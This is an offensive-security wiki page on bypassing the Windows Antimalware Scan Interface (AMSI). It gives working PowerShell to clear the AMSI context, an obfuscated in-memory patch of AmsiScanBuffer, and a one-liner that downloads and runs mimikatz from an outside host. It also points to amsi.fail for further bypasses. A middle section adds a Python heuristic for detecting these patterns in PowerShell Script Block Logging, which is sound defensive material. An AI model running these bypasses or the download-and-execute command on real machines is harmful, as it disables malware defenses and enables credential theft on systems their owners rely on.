# Bypassing AMSI

Windows Antimalware Scan Interface (AMSI) lets any program hand content to whatever antimalware product is registered on the machine. Essentially it is a set of functions exported by **amsi.dll** that programs can call: the program says "hey AMSI, scan this buffer", and AMSI answers :thumbsup: (clean) or :thumbsdown: (malicious).

It's built into PowerShell by default. So even when we load scripts straight into memory, the script content still passes through PowerShell, which hands it to AMSI, so the scan stops the process from even happening.

## AMSI Scan Buffer

{% embed url="https://rastamouse.me/memory-patching-amsi-bypass/" %}

With this technique, once **amsi.dll** has been loaded into memory we find the address of the **AmsiScanBuffer** function and overwrite its first instructions so that it always returns without scanning, which callers treat as a clean result.

Test whether AMSI is active (this is the standard AMSI test string; a working AMSI blocks it):

```powershell
Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"
```

Clear the AMSI context:

```powershell
$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
$g = $f.GetValue($null)
[IntPtr]$ptr = $g
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```

```powershell
# Rasta Mouse's AmsiScanBuffer patch
$vahqn = @"
using System;
using System.Runtime.InteropServices;
public class vahqn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr kyjgnt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vahqn

$kpvseop = [vahqn]::LoadLibrary("$([CHaR](97+37-37)+[chAr](109*100/100)+[Char]([ByTe]0x73)+[cHAr]([BytE]0x69)+[chAR](46+41-41)+[ChAr](100+67-67)+[CHAr]([ByTE]0x6c)+[ChAr]([byte]0x6c))")
$mgciek = [vahqn]::GetProcAddress($kpvseop, "$([cHaR]([ByTe]0x41)+[ChaR](109)+[ChAR]([BYTE]0x73)+[CHar](105+77-77)+[chAR](83+57-57)+[Char](99*6/6)+[CHar]([BYtE]0x61)+[CHAR](60+50)+[Char](66)+[cHAr]([bYTe]0x75)+[cHar]([BYtE]0x66)+[ChaR](102)+[CHAr]([BYTE]0x65)+[char](114*111/111))")
$p = 0
[vahqn]::VirtualProtect($mgciek, [uint32]5, 0x40, [ref]$p)
$cvgm = "0xB8"
$qqvf = "0x57"
$whib = "0x00"
$mvnn = "0x07"
$djza = "0x80"
$hgrw = "0xC3"
$cxgkz = [Byte[]] ($cvgm,$qqvf,$whib,$mvnn,+$djza,+$hgrw)
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $mgciek, 6)
```

Once the patch is in place, anything we run in memory that doesn't touch the disk won't be caught by Windows Defender's AMSI scan.

{% hint style="warning" %}
Any and all EDR solutions will catch this even if AMSI is bypassed.
{% endhint %}

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')
```
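Both snippets above leave distinctive traces in PowerShell Script Block Logging (Event ID 4104), which records the text of each script block as it is invoked, so the bypass itself gets logged even when AMSI has been neutered in-process. As an added example (not from the original page or from Rasta Mouse's post), here is a Python heuristic that scores constructed script block text on those indicators; the indicator weights and the alerting threshold are assumptions:

```python
import re

# Indicators drawn from the snippets on this page: (label, regex, weight).
# Weights and the threshold are assumptions for this example, not a vendor rule.
INDICATORS = [
    ("reflection-on-ref-assembly", re.compile(r"\[Ref\]\.Assembly\.GetTypes\(\)", re.I), 2),
    ("wildcard-amsiutils", re.compile(r'-like\s+["\']\*\w*Utils["\']', re.I), 3),
    ("nonpublic-static-fields", re.compile(r"GetFields\(\s*['\"]NonPublic,\s*Static['\"]", re.I), 2),
    ("wildcard-context", re.compile(r'-like\s+["\']\*Context["\']', re.I), 2),
    ("amsiscanbuffer-literal", re.compile(r"AmsiScanBuffer", re.I), 3),
    ("virtualprotect-pinvoke", re.compile(r'DllImport\(\s*["\']kernel32["\']\s*\)[\s\S]{0,200}?VirtualProtect', re.I), 3),
    ("marshal-copy-to-pointer", re.compile(r"Marshal\]::Copy\(", re.I), 1),
]
CHAR_CONCAT = re.compile(r"\[\s*char\s*\]\s*\(", re.I)    # [CHaR](97+37-37)+[chAr](...) casts
STUB_BYTES = re.compile(r"0xB8[\s\S]{0,120}?0xC3", re.I)   # mov eax, imm32 ; ret spelled as hex strings

def score_script_block(text):
    """Score one script block's text; returns (score, [matched indicator labels])."""
    score, hits = 0, []
    for label, rx, weight in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(label)
    if len(CHAR_CONCAT.findall(text)) >= 6:   # a pile of [char]() casts is string obfuscation
        score += 3
        hits.append("char-concat-obfuscation")
    if STUB_BYTES.search(text):
        score += 3
        hits.append("mov-eax-ret-stub")
    return score, hits

def is_amsi_tamper(text, threshold=5):
    return score_script_block(text)[0] >= threshold

# Constructed sample script blocks, condensed from the snippets shown on this page.
CLEAR_CONTEXT = '''$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)'''
PATCH_STUB = '''[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr a, UIntPtr b, uint c, out uint d);
$m = [vahqn]::GetProcAddress($h, "$([cHaR](65)+[ChaR](109)+[ChAR](115)+[CHar](105)+[chAR](83)+[Char](99))")
$cxgkz = [Byte[]] ("0xB8","0x57","0x00","0x07","0x80","0xC3")
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $m, 6)'''
BENIGN = '''Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Name -like "*.log" }
[System.Runtime.InteropServices.Marshal]::Copy($src, 0, $dst, $src.Length)'''

if __name__ == "__main__":
    for name, block in (("clear-context", CLEAR_CONTEXT), ("patch-stub", PATCH_STUB), ("benign", BENIGN)):
        print(name, is_amsi_tamper(block), score_script_block(block))
```

A lone `Marshal::Copy` in a benign block scores 1 and stays under the threshold; the reflection chain or the P/Invoke-plus-stub combination scores 10.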

## AMSI.Fail

{% embed url="https://amsi.fail/" %}

Amsi.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process only, so once your PowerShell process exits the AMSI bypass goes with it. This makes it a better fit for real engagements, because then you're not just [disabling Windows Defender](/post-exploitation/av-evasion/disabling-windows-defender.md) for the whole machine.
